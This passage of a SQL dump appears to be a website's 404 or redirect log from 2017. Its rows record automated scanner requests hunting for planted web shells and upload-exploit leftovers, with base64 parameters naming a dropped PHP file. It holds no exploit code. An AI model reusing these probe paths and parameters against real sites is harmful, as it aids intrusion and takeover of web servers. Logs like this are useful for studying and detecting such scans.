00:00:00'),(11985,'http://hallcrestheights.org//robots.txt.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:03:18','0000-00-00 00:00:00'),(11986,'http://hallcrestheights.org//jconfig.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:03:24','0000-00-00 00:00:00'),(11987,'http://hallcrestheights.org//media/reads.php?z3=NGtmT1ZCLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:03:31','0000-00-00 00:00:00'),(11988,'http://hallcrestheights.org//wp-admin/users.php?z3=NGtmT1ZCLnBocA==&z4=L3dwLWFkbWluLw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:03:37','0000-00-00 00:00:00'),(11989,'http://hallcrestheights.org//pols.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:02:23','0000-00-00 00:00:00'),(11990,'http://hallcrestheights.org//imdex.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:02:30','0000-00-00 00:00:00'),(11991,'http://hallcrestheights.org//aa.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:03:58','0000-00-00 00:00:00'),(11992,'http://hallcrestheights.org//ytt.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:04:04','0000-00-00 00:00:00'),(11993,'http://hallcrestheights.org//media/1ndex.php?z3=NGtmT1ZCLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:04:33','0000-00-00 00:00:00'),(11994,'http://hallcrestheights.org//libraries/joomla/jmails.php?z3=NGtmT1ZCLnBocA==&z4=L2xpYnJhcmllcy9qb29tbGEv',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:04:41','0000-00-00 00:00:00'),(11995,'http://hallcrestheights.org//sql_dump.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:06:08','0000-00-00 00:00:00'),(11996,'http://hallcrestheights.org//error-logs.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-09-21 05:05:00','0000-00-00 00:00:00'),(11997,'http://hallcrestheights.org//media/404.php?z3=NGtmT1ZCLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-09-21 05:06:46','0000-00-00 00:00:00'),(11998,'http://hallcrestheights.org//media/tmp.php?z3=NGtmT1ZCLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:09:52','0000-00-00 00:00:00'),(11999,'http://hallcrestheights.org//r3x.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:09:59','0000-00-00 00:00:00'),(12000,'http://hallcrestheights.org//log.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:10:06','0000-00-00 00:00:00'),(12001,'http://hallcrestheights.org//images/stories/0day.php?z3=NGtmT1ZCLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:10:13','0000-00-00 00:00:00'),(12002,'http://hallcrestheights.org//includes/u2p.php?z3=NGtmT1ZCLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:09:01','0000-00-00 00:00:00'),(12003,'http://hallcrestheights.org//images/xxx.php?z3=NGtmT1ZCLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-09-21 05:11:10','0000-00-00 00:00:00'),(12004,'http://hallcrestheights.org//al277.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:11:14','0000-00-00 00:00:00'),(12005,'http://hallcrestheights.org//wp-admin/options-media.php?z3=NGtmT1ZCLnBocA==&z4=L3dwLWFkbWluLw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:11:21','0000-00-00 00:00:00'),(12006,'http://hallcrestheights.org//wp-content/advanced-cache.php?z3=NGtmT1ZCLnBocA==&z4=L3dwLWNvbnRlbnQv',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:12:00','0000-00-00 00:00:00'),(12007,'http://hallcrestheights.org//roubt.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:12:08','0000-00-00 00:00:00'),(12008,'http://hallcrestheights.org//includes.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:12:15','0000-00-00 00:00:00'),(12009,'http://hallcrestheights.org//images/al277.php?z3=NGtmT1ZCLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:12:23','0000-00-00 00:00:00'),(12010,'http://hallcrestheights.org//webconfig.txt.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:12:30','0000-00-00 00:00:00'),(12011,'http://hallcrestheights.org//thumb.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:12:42','0000-00-00 00:00:00'),(12012,'http://hallcrestheights.org//configbak.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:13:02','0000-00-00 00:00:00'),(12013,'http://hallcrestheights.org//wp-main.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:13:40','0000-00-00 00:00:00'),(12014,'http://hallcrestheights.org//robot.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:13:47','0000-00-00 00:00:00'),(12015,'http://hallcrestheights.org//install.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-09-21 05:13:54','0000-00-00 00:00:00'),(12016,'http://hallcrestheights.org//images/1ndex.php?z3=NGtmT1ZCLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-09-21 05:14:45','0000-00-00 00:00:00'),(12017,'http://hallcrestheights.org//dswat.org/wsdl.php?z3=NGtmT1ZCLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',1,0,'2017-09-21 05:14:48','0000-00-00 00:00:00'),(12018,'http://hallcrestheights.org//resd.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:15:53','0000-00-00 00:00:00'),(12019,'http://hallcrestheights.org//injctory.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:15:58','0000-00-00 00:00:00'),(12020,'http://hallcrestheights.org//mmytc.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:17:45','0000-00-00 00:00:00'),(12021,'http://hallcrestheights.org//M-F4r3s.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:17:52','0000-00-00 00:00:00'),(12022,'http://hallcrestheights.org//images/laj.php?z3=NGtmT1ZCLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:17:58','0000-00-00 00:00:00'),(12023,'http://hallcrestheights.org//cache/cache_aqbmkwwx.php?z3=NGtmT1ZCLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:16:43','0000-00-00 00:00:00'),(12024,'http://hallcrestheights.org//wsdl.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:18:06','0000-00-00 00:00:00'),(12025,'http://hallcrestheights.org//goog1es.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:18:09','0000-00-00 00:00:00'),(12026,'http://hallcrestheights.org//wp-admin/about.php?z3=NGtmT1ZCLnBocA==&z4=L3dwLWFkbWluLw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:18:56','0000-00-00 00:00:00'),(12027,'http://hallcrestheights.org//site/tmp/cTivrC.php?z3=NGtmT1ZCLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:17:57','0000-00-00 00:00:00'),(12028,'http://hallcrestheights.org//update.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:19:22','0000-00-00 00:00:00'),(12029,'http://hallcrestheights.org//news.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:19:33','0000-00-00 00:00:00'),(12030,'http://hallcrestheights.org//SessionController.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:18:16','0000-00-00 00:00:00'),(12031,'http://hallcrestheights.org//maill.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:24:51','0000-00-00 00:00:00'),(12032,'http://hallcrestheights.org//error-log.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:24:59','0000-00-00 00:00:00'),(12033,'http://hallcrestheights.org//M-J!r4ya-F4r3s.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:25:05','0000-00-00 00:00:00'),(12034,'http://hallcrestheights.org//authenticating.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:25:08','0000-00-00 00:00:00'),(12035,'http://hallcrestheights.org//google-assist.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:25:12','0000-00-00 00:00:00'),(12036,'http://hallcrestheights.org//images/google-assist.php?z3=NGtmT1ZCLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:25:15','0000-00-00 00:00:00'),(12037,'http://hallcrestheights.org//images/robots.txt.php?z3=NGtmT1ZCLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:25:18','0000-00-00 00:00:00'),(12038,'http://hallcrestheights.org//yjh.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:25:21','0000-00-00 00:00:00'),(12039,'http://hallcrestheights.org//Ricsky.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:25:24','0000-00-00 00:00:00'),(12040,'http://hallcrestheights.org//elements.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:25:28','0000-00-00 00:00:00'),(12041,'http://hallcrestheights.org//xmlsrpc.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:25:31','0000-00-00 00:00:00'),(12042,'http://hallcrestheights.org//wp-cache.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:25:36','0000-00-00 00:00:00'),(12043,'http://hallcrestheights.org//images/404.php?z3=NGtmT1ZCLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:25:42','0000-00-00 00:00:00'),(12044,'http://hallcrestheights.org//images/head.php?z3=NGtmT1ZCLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:25:45','0000-00-00 00:00:00'),(12045,'http://hallcrestheights.org//cache/support.php?z3=NGtmT1ZCLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:25:50','0000-00-00 00:00:00'),(12046,'http://hallcrestheights.org//RoseLeif.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:25:52','0000-00-00 00:00:00'),(12047,'http://hallcrestheights.org//Abbrevsprl.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:24:35','0000-00-00 00:00:00'),(12048,'http://hallcrestheights.org//show.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:25:59','0000-00-00 00:00:00'),(12049,'http://hallcrestheights.org//images/defau1t.php?z3=NGtmT1ZCLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:26:01','0000-00-00 00:00:00'),(12050,'http://hallcrestheights.org//cli/40dd1d.php?z3=NGtmT1ZCLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:26:04','0000-00-00 00:00:00'),(12051,'http://hallcrestheights.org//bk.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:26:07','0000-00-00 00:00:00'),(12052,'http://hallcrestheights.org//infos.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:26:13','0000-00-00 00:00:00'),(12053,'http://hallcrestheights.org//cache/defau1t.php?z3=NGtmT1ZCLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:24:57','0000-00-00 00:00:00'),(12054,'http://hallcrestheights.org//A.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',4,0,'2017-09-21 05:25:03','0000-00-00 00:00:00'),(12055,'http://hallcrestheights.org//bookmark.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:25:08','0000-00-00 00:00:00'),(12056,'http://hallcrestheights.org//wp-data.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:26:39','0000-00-00 00:00:00'),(12057,'http://hallcrestheights.org//wp-content/plugins/Fbrrchive.php?z3=NGtmT1ZCLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:26:44','0000-00-00 00:00:00'),(12058,'http://hallcrestheights.org//wp-content/uploads/Fbrrchive.php?z3=NGtmT1ZCLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:25:27','0000-00-00 00:00:00'),(12059,'http://hallcrestheights.org//wp-content/plugins/myshe.php?z3=NGtmT1ZCLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:26:53','0000-00-00 00:00:00'),(12060,'http://hallcrestheights.org//wp-content/plugins/wp-cache.php?z3=NGtmT1ZCLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:26:56','0000-00-00 00:00:00'),(12061,'http://hallcrestheights.org//wp-content/plugins/wp-footers.php?z3=NGtmT1ZCLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:27:01','0000-00-00 00:00:00'),(12062,'http://hallcrestheights.org//wp-content/plugins/wpfootes.php?z3=NGtmT1ZCLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',4,0,'2017-09-21 05:27:05','0000-00-00 00:00:00'),(12063,'http://hallcrestheights.org//wp-content/plugins/sql_dump.php?z3=NGtmT1ZCLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:27:10','0000-00-00 00:00:00'),(12064,'http://hallcrestheights.org//wp-content/plugins/SocketIontrol.php?z3=NGtmT1ZCLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:27:14','0000-00-00 00:00:00'),(12065,'http://hallcrestheights.org//wp-content/plugins/SocketIasrgasfontrol.php?z3=NGtmT1ZCLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:25:57','0000-00-00 00:00:00'),(12066,'http://hallcrestheights.org//wp-content/plugins/caches.php?z3=NGtmT1ZCLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:27:25','0000-00-00 00:00:00'),(12067,'http://hallcrestheights.org//head.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:27:29','0000-00-00 00:00:00'),(12068,'http://hallcrestheights.org//wp-content/plugins/Analyser.php?z3=NGtmT1ZCLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:26:15','0000-00-00 00:00:00'),(12069,'http://hallcrestheights.org//wp-content/plugins/morepaddy.php?z3=NGtmT1ZCLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:27:40','0000-00-00 00:00:00'),(12070,'http://hallcrestheights.org//cache/list.php?z3=NGtmT1ZCLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:26:27','0000-00-00 00:00:00'),(12071,'http://hallcrestheights.org//images/interface.php?z3=NGtmT1ZCLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:27:54','0000-00-00 00:00:00'),(12072,'http://hallcrestheights.org//sqldebug.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:28:01','0000-00-00 00:00:00'),(12073,'http://hallcrestheights.org//xmlrpc-activate.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:28:39','0000-00-00 00:00:00'),(12074,'http://hallcrestheights.org//keep.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:28:59','0000-00-00 00:00:00'),(12075,'http://hallcrestheights.org//tmpos.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:27:46','0000-00-00 00:00:00'),(12076,'http://hallcrestheights.org//link.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:27:51','0000-00-00 00:00:00'),(12077,'http://hallcrestheights.org//dcodzu.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:29:20','0000-00-00 00:00:00'),(12078,'http://hallcrestheights.org//codd.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:29:27','0000-00-00 00:00:00'),(12079,'http://hallcrestheights.org//cache/wcache7675n.PHP?z3=NGtmT1ZCLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:29:32','0000-00-00 00:00:00'),(12080,'http://hallcrestheights.org//modules/mod_bookmark/helper.php?z3=NGtmT1ZCLnBocA==&z4=L21vZHVsZXMvbW9kX2Jvb2ttYXJrLw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:29:39','0000-00-00 00:00:00'),(12081,'http://hallcrestheights.org//content.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:29:46','0000-00-00 00:00:00'),(12082,'http://hallcrestheights.org//wp-content/plugins/sfn.php?z3=NGtmT1ZCLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:29:54','0000-00-00 00:00:00'),(12083,'http://hallcrestheights.org//wp-content/plugins/wp-lg3.php?z3=NGtmT1ZCLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:28:40','0000-00-00 00:00:00'),(12084,'http://hallcrestheights.org//wp-content/plugins/wp-lg2.php?z3=NGtmT1ZCLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:30:07','0000-00-00 00:00:00'),(12085,'http://hallcrestheights.org//shootmei.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:30:13','0000-00-00 00:00:00'),(12086,'http://hallcrestheights.org//dcodqg.php?z3=NGtmT1ZCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:30:20','0000-00-00 00:00:00'),(12087,'http://hallcrestheights.org//modules/mod_simplefileuploadv1.3/elements/4kfOVB.php',NULL,'','',1,0,'2017-09-21 05:30:28','0000-00-00 00:00:00'),(12088,'http://hallcrestheights.org//wp-content/plugins/revslider/temp/update_extract/4kfOVB.php',NULL,'','',1,0,'2017-09-21 05:30:32','0000-00-00 00:00:00'),(12089,'http://hallcrestheights.org//wp-content/uploads/4kfOVB.php',NULL,'','',1,0,'2017-09-21 05:30:39','0000-00-00 00:00:00'),(12090,'http://hallcrestheights.org//4kfOVB.php',NULL,'','',1,0,'2017-09-21 05:30:43','0000-00-00 00:00:00'),(12091,'http://hallcrestheights.org//sites/all/libraries/elfinder/files/4kfOVB.php',NULL,'','',1,0,'2017-09-21 05:30:47','0000-00-00 00:00:00'),(12092,'http://hallcrestheights.org//wp-content/plugins/easyrotator-for-wordpress/a.php?z3=NGtmT1ZCLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy9lYXN5cm90YXRvci1mb3Itd29yZHByZXNzLw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:35:33','0000-00-00 00:00:00'),(12093,'http://hallcrestheights.org//modules/modules/modules.php?z3=NGtmT1ZCLnBocA==&z4=L21vZHVsZXMvbW9kdWxlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:37:01','0000-00-00 00:00:00'),(12094,'http://hallcrestheights.org//wp-content/themes/fossy-speurhondenworst/divi-children-engine/divi_children_engine.php?z3=NGtmT1ZCLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL2Zvc3N5LXNwZXVyaG9uZGVud29yc3QvZGl2aS1jaGlsZHJlbi1lbmdpbmUv',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:35:46','0000-00-00 00:00:00'),(12095,'http://hallcrestheights.org//wp-content/themes/margreetalgra/404.php?z3=NGtmT1ZCLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL21hcmdyZWV0YWxncmEv',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:37:10','0000-00-00 00:00:00'),(12096,'http://hallcrestheights.org//wp-content/themes/twentyeleven-child/footer.php?z3=NGtmT1ZCLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWVsZXZlbi1jaGlsZC8=',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:35:53','0000-00-00 00:00:00'),(12097,'http://hallcrestheights.org//wp-content/1ndex.php?z3=NGtmT1ZCLnBocA==&z4=L3dwLWNvbnRlbnQv',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:37:16','0000-00-00 00:00:00'),(12098,'http://hallcrestheights.org//files/files.php?z3=NGtmT1ZCLnBocA==&z4=L2ZpbGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-09-21 05:37:19','0000-00-00 00:00:00'),(12099,'http://hallcrestheights.org//libraries/joomla/1ndex.php?z3=NGtmT1ZCLnBocA==&z4=L2xpYnJhcmllcy9qb29tbGEv',NULL,'hallcrestheights.org','',1,0,'2017-09-21 05:40:32','0000-00-00 00:00:00'),(12100,'http://hallcrestheights.org/plugins/log.php',NULL,'hallcrestheights.org','',1,0,'2017-09-21 08:20:36','0000-00-00 00:00:00'),(12101,'http://hallcrestheights.org/wp-admin',NULL,'http://hallcrestheights.org','',1,0,'2017-09-21 13:00:03','0000-00-00 00:00:00'),(12102,'http://hallcrestheights.org/cache/accesson.php',NULL,'hallcrestheights.org','',1,0,'2017-09-21 13:22:46','0000-00-00 00:00:00'),(12103,'http://www.hallcrestheights.org/i20162632-k15920-pcscqruf-unpkw-xpoideot-wtvsoar.htm',NULL,'http://www.hallcrestheights.org/','',1,0,'2017-09-25 04:36:44','0000-00-00 00:00:00'),(12104,'http://hallcrestheights.org/configurationbak.php',NULL,'hallcrestheights.org','',32,0,'2017-09-25 09:14:46','0000-00-00 00:00:00'),(12105,'http://hallcrestheights.org/components/com_foxcontact/foxcontact.php',NULL,'','',6,0,'2017-09-25 09:49:42','0000-00-00 00:00:00'),(12106,'http://hallcrestheights.org/images/defau1t.php',NULL,'hallcrestheights.org','',7,0,'2017-09-25 10:48:57','0000-00-00 00:00:00'),(12107,'http://hallcrestheights.org/script.php',NULL,'hallcrestheights.org','',1,0,'2017-09-25 10:50:29','0000-00-00 00:00:00'),(12108,'http://hallcrestheights.org/wp-includes/LICENSE.php',NULL,'hallcrestheights.org','',2,0,'2017-09-27 00:52:19','0000-00-00 00:00:00'),(12109,'http://hallcrestheights.org/wp-rdf.php',NULL,'hallcrestheights.org','',1,0,'2017-09-27 00:55:05','0000-00-00 00:00:00'),(12110,'http://hallcrestheights.org/cache.php',NULL,'hallcrestheights.org','',4,0,'2017-09-27 00:56:33','0000-00-00 00:00:00'),(12111,'http://hallcrestheights.org/wp-feed.php',NULL,'hallcrestheights.org','',2,0,'2017-09-27 00:57:47','0000-00-00 00:00:00'),(12112,'http://hallcrestheights.org/wp-register.php',NULL,'hallcrestheights.org','',1,0,'2017-09-27 00:58:11','0000-00-00 00:00:00'),(12113,'http://www.hallcrestheights.org/trackback/',NULL,'http://www.hallcrestheights.org','',1,0,'2017-09-27 16:59:35','0000-00-00 00:00:00'),(12114,'http://hallcrestheights.org/media/on.php',NULL,'','',1,0,'2017-10-03 05:46:14','0000-00-00 00:00:00'),(12115,'http://hallcrestheights.org/wp-content/index.php',NULL,'hallcrestheights.org','',1,0,'2017-10-03 13:14:59','0000-00-00 00:00:00'),(12116,'http://hallcrestheights.org/modules/modules.php',NULL,'hallcrestheights.org','',1,0,'2017-10-03 13:16:26','0000-00-00 00:00:00'),(12117,'http://hallcrestheights.org/wp-content/plugins/index.php',NULL,'hallcrestheights.org','',1,0,'2017-10-03 13:18:18','0000-00-00 00:00:00'),(12118,'http://hallcrestheights.org/wp-includes/js/tinymce/plugins/wpview/diff.php',NULL,'hallcrestheights.org','',1,0,'2017-10-03 13:17:26','0000-00-00 00:00:00'),(12119,'http://hallcrestheights.org/wp-content/themes/twentyseventeen/inc/color-patterns.php',NULL,'hallcrestheights.org','',1,0,'2017-10-03 13:18:40','0000-00-00 00:00:00'),(12120,'http://hallcrestheights.org/wp-includes/class.wp-times.php',NULL,'hallcrestheights.org','',1,0,'2017-10-03 13:20:16','0000-00-00 00:00:00'),(12121,'http://hallcrestheights.org/yjh.php',NULL,'hallcrestheights.org','',1,0,'2017-10-03 13:20:21','0000-00-00 00:00:00'),(12122,'http://hallcrestheights.org/wp-admin/includes/rnnvhs.php',NULL,'hallcrestheights.org','',1,0,'2017-10-03 13:22:31','0000-00-00 00:00:00'),(12123,'http://hallcrestheights.org/wp-content/themes/error-log.php',NULL,'hallcrestheights.org','',1,0,'2017-10-03 13:24:38','0000-00-00 00:00:00'),(12124,'http://hallcrestheights.org/wp-content/plugins/wp-cache.php',NULL,'hallcrestheights.org','',4,0,'2017-10-03 13:25:04','0000-00-00 00:00:00'),(12125,'http://hallcrestheights.org/wp-admin/includes/lock46.php',NULL,'hallcrestheights.org','',1,0,'2017-10-03 13:26:30','0000-00-00 00:00:00'),(12126,'http://hallcrestheights.org/wp-content/themes/index.php',NULL,'hallcrestheights.org','',1,0,'2017-10-03 13:27:52','0000-00-00 00:00:00'),(12127,'http://hallcrestheights.org/hivcxa.php',NULL,'hallcrestheights.org','',1,0,'2017-10-03 13:26:33','0000-00-00 00:00:00'),(12128,'http://hallcrestheights.org/search.php',NULL,'hallcrestheights.org','',2,0,'2017-10-03 13:28:16','0000-00-00 00:00:00'),(12129,'http://hallcrestheights.org/wp-includes/Text/index.php',NULL,'hallcrestheights.org','',1,0,'2017-10-03 13:29:38','0000-00-00 00:00:00'),(12130,'http://www.hallcrestheights.org//tmp/xax.php',NULL,'','',1,0,'2017-10-05 13:22:46','0000-00-00 00:00:00'),(12131,'http://www.hallcrestheights.org//tmp/vip.php',NULL,'','',1,0,'2017-10-05 13:22:47','0000-00-00 